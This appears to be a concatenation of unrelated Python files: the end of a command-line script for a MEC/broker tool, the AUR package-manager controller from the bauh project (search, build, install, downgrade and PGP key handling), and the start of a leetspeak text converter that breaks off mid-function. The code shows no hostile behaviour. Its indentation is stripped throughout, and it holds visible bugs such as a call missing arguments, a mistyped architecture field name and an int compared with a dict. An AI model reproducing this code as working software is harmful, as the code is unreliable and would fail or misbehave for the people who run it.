parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
controller.py
|
import json
import os
import re
import shutil
import subprocess
import time
from pathlib import Path
from threading import Thread
from typing import List, Set, Type
import requests
from bauh.api.abstract.controller import SearchResult, SoftwareManager, ApplicationContext
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher
from bauh.api.abstract.model import PackageUpdate, PackageHistory, SoftwarePackage, PackageSuggestion, PackageStatus
from bauh.api.abstract.view import MessageType
from bauh.commons.category import CategoriesDownloader
from bauh.commons.html import bold
from bauh.commons.system import SystemProcess, ProcessHandler, new_subprocess, run_cmd, new_root_subprocess, \
SimpleProcess
from bauh.gems.arch import BUILD_DIR, aur, pacman, makepkg, pkgbuild, message, confirmation, disk, git, suggestions, \
gpg, URL_CATEGORIES_FILE, CATEGORIES_CACHE_DIR, CATEGORIES_FILE_PATH
from bauh.gems.arch.aur import AURClient
from bauh.gems.arch.mapper import ArchDataMapper
from bauh.gems.arch.model import ArchPackage
from bauh.gems.arch.worker import AURIndexUpdater, ArchDiskCacheUpdater, ArchCompilationOptimizer
URL_GIT = 'https://aur.archlinux.org/{}.git'
URL_PKG_DOWNLOAD = 'https://aur.archlinux.org/cgit/aur.git/snapshot/{}.tar.gz'
URL_SRC_INFO = 'https://aur.archlinux.org/cgit/aur.git/plain/.SRCINFO?h='
RE_SPLIT_VERSION = re.compile(r'(=|>|<)')
SOURCE_FIELDS = ('source', 'source_x86_64')
RE_PRE_DOWNLOADABLE_FILES = re.compile(r'(https?|ftp)://.+\.\w+[^gpg|git]$')
SEARCH_OPTIMIZED_MAP = {
'google chrome': 'google-chrome',
'chrome google': 'google-chrome',
'googlechrome': 'google-chrome'
}
class ArchManager(SoftwareManager):
def __init__(self, context: ApplicationContext):
super(ArchManager, self).__init__(context=context)
self.aur_cache = context.cache_factory.new()
# context.disk_loader_factory.map(ArchPackage, self.aur_cache) TODO
self.mapper = ArchDataMapper(http_client=context.http_client)
self.i18n = context.i18n
self.aur_client = AURClient(context.http_client)
self.names_index = {}
self.aur_index_updater = AURIndexUpdater(context, self)
self.dcache_updater = ArchDiskCacheUpdater(context.logger, context.disk_cache)
self.comp_optimizer = ArchCompilationOptimizer(context.logger)
self.logger = context.logger
self.enabled = True
self.arch_distro = context.distro == 'arch'
self.categories_mapper = CategoriesDownloader('AUR', context.http_client, context.logger, self, self.context.disk_cache,
URL_CATEGORIES_FILE, CATEGORIES_CACHE_DIR, CATEGORIES_FILE_PATH)
self.categories = {}
def _upgrade_search_result(self, apidata: dict, installed_pkgs: dict, downgrade_enabled: bool, res: SearchResult, disk_loader: DiskCacheLoader):
app = self.mapper.map_api_data(apidata, installed_pkgs['not_signed'], self.categories)
app.downgrade_enabled = downgrade_enabled
if app.installed:
res.installed.append(app)
if disk_loader:
disk_loader.fill(app)
else:
res.new.append(app)
Thread(target=self.mapper.fill_package_build, args=(app,), daemon=True).start()
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1) -> SearchResult:
self.comp_optimizer.join()
downgrade_enabled = git.is_enabled()
res = SearchResult([], [], 0)
installed = {}
read_installed = Thread(target=lambda: installed.update(pacman.list_and_map_installed()), daemon=True)
read_installed.start()
mapped_words = SEARCH_OPTIMIZED_MAP.get(words)
api_res = self.aur_client.search(mapped_words if mapped_words else words)
if api_res and api_res.get('results'):
read_installed.join()
for pkgdata in api_res['results']:
self._upgrade_search_result(pkgdata, installed, downgrade_enabled, res, disk_loader)
else: # if there are no results from the API (it could be because there were too many), tries the names index:
if self.names_index:
to_query = set()
for norm_name, real_name in self.names_index.items():
if words in norm_name:
to_query.add(real_name)
if len(to_query) == 25:
break
pkgsinfo = self.aur_client.get_info(to_query)
if pkgsinfo:
read_installed.join()
for pkgdata in pkgsinfo:
self._upgrade_search_result(pkgdata, installed, res)
res.total = len(res.installed) + len(res.new)
return res
def _fill_aur_pkgs(self, not_signed: dict, pkgs: list, disk_loader: DiskCacheLoader, internet_available: bool):
downgrade_enabled = git.is_enabled()
if internet_available:
try:
pkgsinfo = self.aur_client.get_info(not_signed.keys())
if pkgsinfo:
for pkgdata in pkgsinfo:
pkg = self.mapper.map_api_data(pkgdata, not_signed, self.categories)
pkg.downgrade_enabled = downgrade_enabled
if disk_loader:
disk_loader.fill(pkg)
pkg.status = PackageStatus.READY
pkgs.append(pkg)
return
except requests.exceptions.ConnectionError:
self.logger.warning('Could not retrieve installed AUR packages API data. It seems the internet connection is off.')
self.logger.info("Reading only local AUR packages data")
for name, data in not_signed.items():
pkg = ArchPackage(name=name, version=data.get('version'),
latest_version=data.get('version'), description=data.get('description'),
installed=True, mirror='aur')
pkg.categories = self.categories.get(pkg.name)
pkg.downgrade_enabled = downgrade_enabled
if disk_loader:
disk_loader.fill(pkg)
pkg.status = PackageStatus.READY
pkgs.append(pkg)
def _fill_mirror_pkgs(self, mirrors: dict, apps: list):
# TODO
for name, data in mirrors.items():
app = ArchPackage(name=name, version=data.get('version'), latest_version=data.get('version'), description=data.get('description'))
app.installed = True
app.mirror = '' # TODO
app.update = False # TODO
apps.append(app)
def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
installed = pacman.list_and_map_installed()
apps = []
if installed and installed['not_signed']:
self.dcache_updater.join()
self.categories_mapper.join()
self._fill_aur_pkgs(installed['not_signed'], apps, disk_loader, internet_available)
return SearchResult(apps, None, len(apps))
def downgrade(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
handler = ProcessHandler(watcher)
app_build_dir = '{}/build_{}'.format(BUILD_DIR, int(time.time()))
watcher.change_progress(5)
try:
if not os.path.exists(app_build_dir):
build_dir = handler.handle(SystemProcess(new_subprocess(['mkdir', '-p', app_build_dir])))
if build_dir:
watcher.change_progress(10)
watcher.change_substatus(self.i18n['arch.clone'].format(bold(pkg.name)))
clone = handler.handle(SystemProcess(subproc=new_subprocess(['git', 'clone', URL_GIT.format(pkg.name)], cwd=app_build_dir), check_error_output=False))
watcher.change_progress(30)
if clone:
watcher.change_substatus(self.i18n['arch.downgrade.reading_commits'])
clone_path = '{}/{}'.format(app_build_dir, pkg.name)
pkgbuild_path = '{}/PKGBUILD'.format(clone_path)
commits = run_cmd("git log", cwd=clone_path)
watcher.change_progress(40)
if commits:
commit_list = re.findall(r'commit (.+)\n', commits)
if commit_list:
if len(commit_list) > 1:
for idx in range(1, len(commit_list)):
commit = commit_list[idx]
with open(pkgbuild_path) as f:
pkgdict = aur.map_pkgbuild(f.read())
if not handler.handle(SystemProcess(subproc=new_subprocess(['git', 'reset', '--hard', commit], cwd=clone_path), check_error_output=False)):
watcher.print('Could not downgrade anymore. Aborting...')
return False
if '{}-{}'.format(pkgdict.get('pkgver'), pkgdict.get('pkgrel')) == pkg.version:
# current version found
watcher.change_substatus(self.i18n['arch.downgrade.version_found'])
break
watcher.change_substatus(self.i18n['arch.downgrade.install_older'])
return self._make_pkg(pkg.name, pkg.maintainer, root_password, handler, app_build_dir, clone_path, dependency=False, skip_optdeps=True)
else:
watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.impossible'].format(pkg.name),
type_=MessageType.ERROR)
return False
watcher.show_message(title=self.i18n['error'], body=self.i18n['arch.downgrade.no_commits'], type_=MessageType.ERROR)
return False
finally:
if os.path.exists(app_build_dir):
handler.handle(SystemProcess(subproc=new_subprocess(['rm', '-rf', app_build_dir])))
return False
def clean_cache_for(self, pkg: ArchPackage):
if os.path.exists(pkg.get_disk_cache_path()):
shutil.rmtree(pkg.get_disk_cache_path())
def update(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
return self.install(pkg=pkg, root_password=root_password, watcher=watcher, skip_optdeps=True)
def _uninstall(self, pkg_name: str, root_password: str, handler: ProcessHandler) -> bool:
res = handler.handle(SystemProcess(new_root_subprocess(['pacman', '-R', pkg_name, '--noconfirm'], root_password)))
if res:
cached_paths = [ArchPackage.disk_cache_path(pkg_name, 'aur'), ArchPackage.disk_cache_path(pkg_name, 'mirror')]
for path in cached_paths:
if os.path.exists(path):
shutil.rmtree(path)
break
return res
def uninstall(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
handler = ProcessHandler(watcher)
watcher.change_progress(10)
info = pacman.get_info_dict(pkg.name)
watcher.change_progress(50)
if info.get('required by'):
pkname = bold(pkg.name)
msg = '{}:<br/><br/>{}<br/><br/>{}'.format(self.i18n['arch.uninstall.required_by'].format(pkname), bold(info['required by']), self.i18n['arch.uninstall.required_by.advice'].format(pkname))
watcher.show_message(title=self.i18n['error'], body=msg, type_=MessageType.WARNING)
return False
uninstalled = self._uninstall(pkg.name, root_password, handler)
watcher.change_progress(100)
return uninstalled
def get_managed_types(self) -> Set["type"]:
return {ArchPackage}
def get_info(self, pkg: ArchPackage) -> dict:
if pkg.installed:
t = Thread(target=self.mapper.fill_package_build, args=(pkg,))
t.start()
info = pacman.get_info_dict(pkg.name)
t.join()
if pkg.pkgbuild:
info['13_pkg_build'] = pkg.pkgbuild
info['14_installed_files'] = pacman.list_installed_files(pkg.name)
return info
else:
info = {
'01_id': pkg.id,
'02_name': pkg.name,
'03_version': pkg.version,
'04_popularity': pkg.popularity,
'05_votes': pkg.votes,
'06_package_base': pkg.package_base,
'07_maintainer': pkg.maintainer,
'08_first_submitted': pkg.first_submitted,
'09_last_modified': pkg.last_modified,
'10_url': pkg.url_download
}
srcinfo = self.aur_client.get_src_info(pkg.name)
if srcinfo:
if srcinfo.get('depends'):
info['11_dependson'] = srcinfo['depends']
if srcinfo.get('optdepends'):
info['12_optdepends'] = srcinfo['optdepends']
if pkg.pkgbuild:
info['00_pkg_build'] = pkg.pkgbuild
else:
info['11_pkg_build_url'] = pkg.get_pkg_build_url()
return info
def get_history(self, pkg: ArchPackage) -> PackageHistory:
temp_dir = '{}/build_{}'.format(BUILD_DIR, int(time.time()))
try:
Path(temp_dir).mkdir(parents=True)
run_cmd('git clone ' + URL_GIT.format(pkg.name), print_error=False, cwd=temp_dir)
clone_path = '{}/{}'.format(temp_dir, pkg.name)
pkgbuild_path = '{}/PKGBUILD'.format(clone_path)
commits = git.list_commits(clone_path)
if commits:
history, status_idx = [], -1
for idx, commit in enumerate(commits):
with open(pkgbuild_path) as f:
pkgdict = aur.map_pkgbuild(f.read())
if status_idx < 0 and '{}-{}'.format(pkgdict.get('pkgver'), pkgdict.get('pkgrel')) == pkg.version:
status_idx = idx
history.append({'1_version': pkgdict['pkgver'], '2_release': pkgdict['pkgrel'],
'3_date': commit['date']}) # the number prefix is to ensure the rendering order
if idx + 1 < len(commits):
if not run_cmd('git reset --hard ' + commits[idx + 1]['commit'], cwd=clone_path):
break
return PackageHistory(pkg=pkg, history=history, pkg_status_idx=status_idx)
finally:
if os.path.exists(temp_dir):
shutil.rmtree(temp_dir)
def _install_deps(self, deps: Set[str], pkg_mirrors: dict, root_password: str, handler: ProcessHandler, change_progress: bool = False) -> str:
"""
:param deps:
:param pkg_mirrors:
:param root_password:
:param handler:
:return: not installed dependency
"""
progress_increment = int(100 / len(deps))
progress = 0
self._update_progress(handler.watcher, 1, change_progress)
for pkgname in deps:
mirror = pkg_mirrors[pkgname]
handler.watcher.change_substatus(self.i18n['arch.install.dependency.install'].format(bold('{} ()'.format(pkgname, mirror))))
if mirror == 'aur':
installed = self._install_from_aur(pkgname=pkgname, maintainer=None, root_password=root_password, handler=handler, dependency=True, change_progress=False)
else:
installed = self._install(pkgname=pkgname, maintainer=None, root_password=root_password, handler=handler, install_file=None, mirror=mirror, change_progress=False)
if not installed:
return pkgname
progress += progress_increment
self._update_progress(handler.watcher, progress, change_progress)
self._update_progress(handler.watcher, 100, change_progress)
def _map_mirrors(self, pkgnames: Set[str]) -> dict:
pkg_mirrors = pacman.get_mirrors(pkgnames) # getting mirrors set
if len(pkgnames) != pkg_mirrors: # checking if any dep not found in the distro mirrors are from AUR
nomirrors = {p for p in pkgnames if p not in pkg_mirrors}
for pkginfo in self.aur_client.get_info(nomirrors):
if pkginfo.get('Name') in nomirrors:
pkg_mirrors[pkginfo['Name']] = 'aur'
return pkg_mirrors
def _pre_download_source(self, pkgname: str, project_dir: str, watcher: ProcessWatcher) -> bool:
if self.context.file_downloader.is_multithreaded():
srcinfo = self.aur_client.get_src_info(pkgname)
pre_download_files = []
for attr in SOURCE_FIELDS:
if srcinfo.get(attr):
if attr == 'source_x86_x64' and not self.context.is_system_x86_64():
continue
else:
for f in srcinfo[attr]:
if RE_PRE_DOWNLOADABLE_FILES.findall(f):
pre_download_files.append(f)
if pre_download_files:
for f in pre_download_files:
fdata = f.split('::')
args = {'watcher': watcher, 'cwd': project_dir}
if len(fdata) > 1:
args.update({'file_url': fdata[1], 'output_path': fdata[0]})
else:
args.update({'file_url': fdata[0], 'output_path': None})
if not self.context.file_downloader.download(**args):
watcher.print('Could not download source file {}'.format(args['file_url']))
return False
return True
def _make_pkg(self, pkgname: str, maintainer: str, root_password: str, handler: ProcessHandler, build_dir: str, project_dir: str, dependency: bool, skip_optdeps: bool = False, change_progress: bool = True) -> bool:
self._pre_download_source(pkgname, project_dir, handler.watcher)
self._update_progress(handler.watcher, 50, change_progress)
if not self._install_missings_deps_and_keys(pkgname, root_password, handler, project_dir):
return False
# building main package
handler.watcher.change_substatus(self.i18n['arch.building.package'].format(bold(pkgname)))
pkgbuilt, output = handler.handle_simple(SimpleProcess(['makepkg', '-ALcsmf'], cwd=project_dir))
self._update_progress(handler.watcher, 65, change_progress)
if pkgbuilt:
gen_file = [fname for root, dirs, files in os.walk(build_dir) for fname in files if re.match(r'^{}-.+\.tar\.xz'.format(pkgname), fname)]
if not gen_file:
handler.watcher.print('Could not find generated .tar.xz file. Aborting...')
return False
install_file = '{}/{}'.format(project_dir, gen_file[0])
if self._install(pkgname=pkgname, maintainer=maintainer, root_password=root_password, mirror='aur', handler=handler,
install_file=install_file, pkgdir=project_dir, change_progress=change_progress):
if dependency or skip_optdeps:
return True
handler.watcher.change_substatus(self.i18n['arch.optdeps.checking'].format(bold(pkgname)))
if self._install_optdeps(pkgname, root_password, handler, project_dir, change_progress=change_progress):
return True
return False
def _install_missings_deps_and_keys(self, pkgname: str, root_password: str, handler: ProcessHandler, pkgdir: str) -> bool:
handler.watcher.change_substatus(self.i18n['arch.checking.deps'].format(bold(pkgname)))
check_res = makepkg.check(pkgdir, handler)
if check_res:
if check_res.get('missing_deps'):
depnames = {RE_SPLIT_VERSION.split(dep)[0] for dep in check_res['missing_deps']}
dep_mirrors = self._map_mirrors(depnames)
for dep in depnames: # cheking if a dependency could not be found in any mirror
if dep not in dep_mirrors:
message.show_dep_not_found(dep, self.i18n, handler.watcher)
return False
handler.watcher.change_substatus(self.i18n['arch.missing_deps_found'].format(bold(pkgname)))
if not confirmation.request_install_missing_deps(pkgname, dep_mirrors, handler.watcher, self.i18n):
handler.watcher.print(self.i18n['action.cancelled'])
return False
dep_not_installed = self._install_deps(depnames, dep_mirrors, root_password, handler, change_progress=False)
if dep_not_installed:
message.show_dep_not_installed(handler.watcher, pkgname, dep_not_installed, self.i18n)
return False
# it is necessary to re-check because missing PGP keys are only notified when there are none missing
return self._install_missings_deps_and_keys(pkgname, root_password, handler, pkgdir)
if check_res.get('gpg_key'):
if handler.watcher.request_confirmation(title=self.i18n['arch.aur.install.unknown_key.title'],
body=self.i18n['arch.install.aur.unknown_key.body'].format(bold(pkgname), bold(check_res['gpg_key']))):
handler.watcher.change_substatus(self.i18n['arch.aur.install.unknown_key.status'].format(bold(check_res['gpg_key'])))
if not handler.handle(gpg.receive_key(check_res['gpg_key'])):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.unknown_key.receive_error'].format(bold(check_res['gpg_key'])))
return False
else:
handler.watcher.print(self.i18n['action.cancelled'])
return False
if check_res.get('validity_check'):
handler.watcher.show_message(title=self.i18n['arch.aur.install.validity_check.title'],
body=self.i18n['arch.aur.install.validity_check.body'].format(bold(pkgname)),
type_=MessageType.ERROR)
return False
return True
def _install_optdeps(self, pkgname: str, root_password: str, handler: ProcessHandler, pkgdir: str, change_progress: bool = True) -> bool:
with open('{}/.SRCINFO'.format(pkgdir)) as f:
odeps = pkgbuild.read_optdeps_as_dict(f.read())
if not odeps:
return True
to_install = {d for d in odeps if not pacman.check_installed(d)}
if not to_install:
return True
pkg_mirrors = self._map_mirrors(to_install)
if pkg_mirrors:
final_optdeps = {dep: {'desc': odeps.get(dep), 'mirror': pkg_mirrors.get(dep)} for dep in to_install if dep in pkg_mirrors}
deps_to_install = confirmation.request_optional_deps(pkgname, final_optdeps, handler.watcher, self.i18n)
if not deps_to_install:
return True
else:
dep_not_installed = self._install_deps(deps_to_install, pkg_mirrors, root_password, handler, change_progress=True)
if dep_not_installed:
message.show_optdep_not_installed(dep_not_installed, handler.watcher, self.i18n)
return False
return True
def _install(self, pkgname: str, maintainer: str, root_password: str, mirror: str, handler: ProcessHandler, install_file: str = None, pkgdir: str = '.', change_progress: bool = True):
check_install_output = []
pkgpath = install_file if install_file else pkgname
handler.watcher.change_substatus(self.i18n['arch.checking.conflicts'].format(bold(pkgname)))
for check_out in SimpleProcess(['pacman', '-U' if install_file else '-S', pkgpath], root_password=root_password, cwd=pkgdir).instance.stdout:
check_install_output.append(check_out.decode())
self._update_progress(handler.watcher, 70, change_progress)
if check_install_output and 'conflict' in check_install_output[-1]:
conflicting_apps = [w[0] for w in re.findall(r'((\w|\-|\.)+)\s(and|are)', check_install_output[-1])]
conflict_msg = ' {} '.format(self.i18n['and']).join([bold(c) for c in conflicting_apps])
if not handler.watcher.request_confirmation(title=self.i18n['arch.install.conflict.popup.title'],
body=self.i18n['arch.install.conflict.popup.body'].format(conflict_msg)):
handler.watcher.print(self.i18n['action.cancelled'])
return False
else: # uninstall conflicts
self._update_progress(handler.watcher, 75, change_progress)
to_uninstall = [conflict for conflict in conflicting_apps if conflict != pkgname]
for conflict in to_uninstall:
handler.watcher.change_substatus(self.i18n['arch.uninstalling.conflict'].format(bold(conflict)))
if not self._uninstall(conflict, root_password, handler):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.uninstalling.conflict.fail'].format(bold(conflict)),
type_=MessageType.ERROR)
return False
handler.watcher.change_substatus(self.i18n['arch.installing.package'].format(bold(pkgname)))
self._update_progress(handler.watcher, 80, change_progress)
installed = handler.handle(pacman.install_as_process(pkgpath=pkgpath, root_password=root_password, aur=install_file is not None, pkgdir=pkgdir))
self._update_progress(handler.watcher, 95, change_progress)
if installed and self.context.disk_cache:
handler.watcher.change_substatus(self.i18n['status.caching_data'].format(bold(pkgname)))
if self.context.disk_cache:
disk.save_several({pkgname}, mirror=mirror, maintainer=maintainer, overwrite=True, categories=self.categories)
self._update_progress(handler.watcher, 100, change_progress)
return installed
def _update_progress(self, watcher: ProcessWatcher, val: int, change_progress: bool):
if change_progress:
watcher.change_progress(val)
def _import_pgp_keys(self, pkgname: str, root_password: str, handler: ProcessHandler):
srcinfo = self.aur_client.get_src_info(pkgname)
if srcinfo.get('validpgpkeys'):
handler.watcher.print(self.i18n['arch.aur.install.verifying_pgp'])
keys_to_download = [key for key in srcinfo['validpgpkeys'] if not pacman.verify_pgp_key(key)]
if keys_to_download:
keys_str = ''.join(
['<br/><span style="font-weight:bold"> - {}</span>'.format(k) for k in keys_to_download])
msg_body = '{}:<br/>{}<br/><br/>{}'.format(self.i18n['arch.aur.install.pgp.body'].format(bold(pkgname)),
keys_str, self.i18n['ask.continue'])
if handler.watcher.request_confirmation(title=self.i18n['arch.aur.install.pgp.title'], body=msg_body):
for key in keys_to_download:
handler.watcher.change_substatus(self.i18n['arch.aur.install.pgp.substatus'].format(bold(key)))
if not handler.handle(pacman.receive_key(key, root_password)):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.pgp.receive_fail'].format(
bold(key)),
type_=MessageType.ERROR)
return False
if not handler.handle(pacman.sign_key(key, root_password)):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.pgp.sign_fail'].format(
bold(key)),
type_=MessageType.ERROR)
return False
handler.watcher.change_substatus(self.i18n['arch.aur.install.pgp.success'])
else:
handler.watcher.print(self.i18n['action.cancelled'])
return False
def _install_from_aur(self, pkgname: str, maintainer: str, root_password: str, handler: ProcessHandler, dependency: bool, skip_optdeps: bool = False, change_progress: bool = True) -> bool:
app_build_dir = '{}/build_{}'.format(BUILD_DIR, int(time.time()))
try:
if not os.path.exists(app_build_dir):
build_dir = handler.handle(SystemProcess(new_subprocess(['mkdir', '-p', app_build_dir])))
self._update_progress(handler.watcher, 10, change_progress)
if build_dir:
file_url = URL_PKG_DOWNLOAD.format(pkgname)
file_name = file_url.split('/')[-1]
handler.watcher.change_substatus('{} {}'.format(self.i18n['arch.downloading.package'], bold(file_name)))
download = handler.handle(SystemProcess(new_subprocess(['wget', file_url], cwd=app_build_dir), check_error_output=False))
if download:
self._update_progress(handler.watcher, 30, change_progress)
handler.watcher.change_substatus('{} {}'.format(self.i18n['arch.uncompressing.package'], bold(file_name)))
uncompress = handler.handle(SystemProcess(new_subprocess(['tar', 'xvzf', '{}.tar.gz'.format(pkgname)], cwd=app_build_dir)))
self._update_progress(handler.watcher, 40, change_progress)
if uncompress:
uncompress_dir = '{}/{}'.format(app_build_dir, pkgname)
return self._make_pkg(pkgname=pkgname,
maintainer=maintainer,
root_password=root_password,
handler=handler,
build_dir=app_build_dir,
project_dir=uncompress_dir,
dependency=dependency,
skip_optdeps=skip_optdeps,
change_progress=change_progress)
finally:
if os.path.exists(app_build_dir):
handler.handle(SystemProcess(new_subprocess(['rm', '-rf', app_build_dir])))
return False
def install(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher, skip_optdeps: bool = False) -> bool:
res = self._install_from_aur(pkg.name, pkg.maintainer, root_password, ProcessHandler(watcher), dependency=False, skip_optdeps=skip_optdeps)
if res:
if os.path.exists(pkg.get_disk_data_path()):
with open(pkg.get_disk_data_path()) as f:
data = f.read()
if data:
data = json.loads(data)
pkg.fill_cached_data(data)
return res
def _is_wget_available(self):
res = run_cmd('which wget')
return res and not res.strip().startswith('which ')
def is_enabled(self) -> bool:
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
try:
return self.arch_distro and pacman.is_enabled() and self._is_wget_available()
except FileNotFoundError:
return False
def is_downgrade_enabled(self) -> bool:
try:
new_subprocess(['git', '--version'])
return True
except FileNotFoundError:
return False
def cache_to_disk(self, pkg: ArchPackage, icon_bytes: bytes, only_icon: bool):
pass
def requires_root(self, action: str, pkg: ArchPackage):
return action != 'search'
def prepare(self):
self.dcache_updater.start()
self.comp_optimizer.start()
self.aur_index_updater.start()
self.categories_mapper.start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
installed = self.read_installed(disk_loader=None, internet_available=internet_available).installed
return [PackageUpdate(p.id, p.latest_version, 'aur') for p in installed if p.update]
def list_warnings(self, internet_available: bool) -> List[str]:
warnings = []
if self.arch_distro:
if not pacman.is_enabled():
warnings.append(self.i18n['arch.warning.disabled'].format(bold('pacman')))
if not self._is_wget_available():
warnings.append(self.i18n['arch.warning.disabled'].format(bold('wget')))
if not git.is_enabled():
warnings.append(self.i18n['arch.warning.git'].format(bold('git')))
return warnings
def list_suggestions(self, limit: int) -> List[PackageSuggestion]:
res = []
sugs = [(i, p) for i, p in suggestions.ALL.items()]
sugs.sort(key=lambda t: t[1].value, reverse=True)
if limit > 0:
sugs = sugs[0:limit]
sug_names = {s[0] for s in sugs}
api_res = self.aur_client.get_info(sug_names)
if api_res:
self.categories_mapper.join()
for pkg in api_res:
if pkg.get('Name') in sug_names:
res.append(PackageSuggestion(self.mapper.map_api_data(pkg, {}, self.categories), suggestions.ALL.get(pkg['Name'])))
return res
def is_default_enabled(self) -> bool:
return False
def launch(self, pkg: ArchPackage):
if pkg.command:
subprocess.Popen(pkg.command.split(' '))
def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
pass
|
LeetSpeak.py
|
import random,copy,operator
from multiprocessing import Process,Pipe
from Dictionary import Dictionary
from Spelling import Spelling
#from GutenBooks import GutenBooks
#thread info: http://jessenoller.com/2009/02/01/python-threads-and-the-global-interpreter-lock/
#def synchronized():
# the_lock = Lock()
# def fwrap(function):
# def newFunction(*args, **kw):
# with the_lock:
# return function(*args, **kw)
# return newFunction
# return fwrap
class LeetSpeak:
def __init__(self,processes=1):
#number of threads
if processes > 0:
self.processes=processes
else:
self.processes=1
#load word frequency and spell checker
self.spelling=Spelling()
#load the dictionaries
self.jargon = Dictionary("slang")
self.dictionary = self.spelling.dictionary
self.stopwords = self.spelling.stopwords
self.a=["a","4","@","/-\\","/\\","/_\\","^","aye","ci","λ","∂","//-\\\\","/=\\","ae"]
self.b=["b","8","|3","6","13","l3","]3","|o","1o","lo","ß","]]3","|8","l8","18","]8"]
self.c=["c","(","<","[","{","sea","see","k","©","¢","€"]
self.d=["d","|]","l]","1]","|)","l)","1)","[)","|}","l]","1}","])","i>","|>","l>","1>","0","cl","o|","o1","ol","Ð","∂","ð"]
self.e=["e","3","&","[-","€","ii","ə","£","iii"]
self.f=["f","|=","]=","}","ph","(=","[=","ʃ","eph","ph"]
self.g=["g","6","9","&","(_+","C-","gee","jee","(Y,","cj","[","-","(γ,","(_-"]
self.h=["h","|-|","#","[-]","{-}","]-[",")-(","(-)",":-:","}{","}-{","aych","╫","]]-[[","aech"]
self.i=["!","1","|","l","eye","3y3","ai","i"]
self.j=["j","_|","_/","]","</","_)","_l","_1","¿","ʝ","ul","u1","u|","jay","(/","_]"]
self.k=["k","x","|<","|x","|{","/<","\\<","/x","\\x","ɮ","kay"]
self.l=["l","1","7","|_","1_","l_","lJ","£","¬","el"]
self.m=["m","/\/\\","|\\/|","em","|v|","[v]","^^","nn","//\\\\//\\\\","(V)","(\/)","/|\\","/|/|",".\\\\","/^^\\","/V\\","|^^|","JVL","][\\\\//][","[]\/[]","[]v[]","(t)"]
self.n=["n","|\\|","/\\/","//\\\\//","[\\]","<\\>","{\\}","//","[]\\[]","]\\[","~","₪","/|/","in"]
#the ω is because Ω is mistakenly taken as that character sometimes...
self.o=["o","0","()","oh","[]","{}","¤","Ω","ω","*","[[]]","oh"]
self.p=["p","|*","l*","1*","|o","lo","1o","|>","l>","1>","|\"","l\"","1\"","?","9","[]d","|7","l7","17","q","|d","ld","1d","℗","|º","1º","lº","þ","¶","pee"]
self.q=["q","0_","o_","0,","o,","(,)","[,]","<|","<l","<1","cue","9","¶","kew"]
self.r=["r","|2","l2","12","2","/2","I2","|^","l^","1^","|~","l~","1~","lz","[z","|`","l`","1`",".-","®","Я","ʁ","|?","l?","1?","arr"]
self.s=["s","5","$","z","es","2","§","š",",,\\``"]
self.t=["t","7","+","-|-","-l-","-1-","1","']['","†"]
self.u=["u","|_|","l_l","1_1","(_)","[_]","{_}","y3w","m","\\_/","\\_\\","/_/","µ","yew","yoo","yuu"]
self.v=["v","\\/","\\\\//","√"]
self.w=["w","\\/\\/","vv","'//","\\\\'","\\^/","(n)","\\x/","\\|/","\\_|_/","\\_l_/","\\_1_/","\\//\\//","\\_:_/","]i[","uu","Ш","ɰ","1/\\/","\\/1/","1/1/"]
self.x=["x","%","><","><,","}{","ecks","x","*",")(","ex","Ж","×"]
self.y=["y","j","`/","`(","-/","'/","\\-/","Ψ","φ","λ","Ч","¥","``//","\\j","wai"]
self.z=["z","2","~/_","%","7_","ʒ","≥","`/_"]
self.zero=["0","o","zero","cero","()"]
self.one=["1","won","one","l","|","]["]
self.two=["two","to","too","2","z"]
self.three=["e","3","three"]
self.four=["4","four","for","fore","a"]
self.five=["5","five","s"]
self.six=["6","six","g"]
self.seven=["7","seven","t","l"]
self.eight=["8","eight","b"]
self.nine=["9","nine","g"]
#"0":self.zero,"1":self.one,"2":self.two,"3":self.three,"4":self.four,"5":self.five,"6":self.six,"7":self.seven,"8":self.eight,"9":self.nine
self.alphabet={"a":self.a, "b":self.b, "c":self.c, "d":self.d, "e":self.e, "f":self.f, "g":self.g, "h":self.h, "i":self.i, "j":self.j, "k":self.k, "l":self.l, "m":self.m, "n":self.n, "o":self.o, "p":self.p, "q":self.q, "r":self.r, "s":self.s, "t":self.t, "u":self.u, "v":self.v, "w":self.w, "x":self.x, "y":self.y, "z":self.z}
def ConvertToLeet(self,text):
"""
This is fairly straightforward. Randomly select letters from the array of letters and output it.
"""
leet=""
for letter in list(text):
if letter.isalpha() and self.alphabet[letter.lower()]:
values=self.alphabet[letter.lower()]
random.seed()
number=random.randint(1,len(values))
leet+=values[number-1]
else:
leet+=letter
return leet
def rec_parse(self,text,previous=[]):
"""
Input:
Output:
"""
possibilities=[]
text_length=len(list(text))
if text_length > 7:
length=8
else:
length=text_length
for q in range(1,length):
if q < len(text):
possibilities.append(previous+[text[0:q],text[q:text_length]])
possibilities+=self.rec_parse(text[q:text_length],previous+[text[0:q]])
return possibilities
def rec_scan_array(self,array,previous=[]):
"""
Input: [['h'], ['e'], ['i', 'l', 't'], ['i', 'l', 't'], ['d', 'o']]
Output:
['h','e','i','i','d'],
['h','e','i','i','o'],
['h','e','i','1','d'],
['h','e','i','1','o'],
...
"""
words=[]
passon=copy.copy(array)
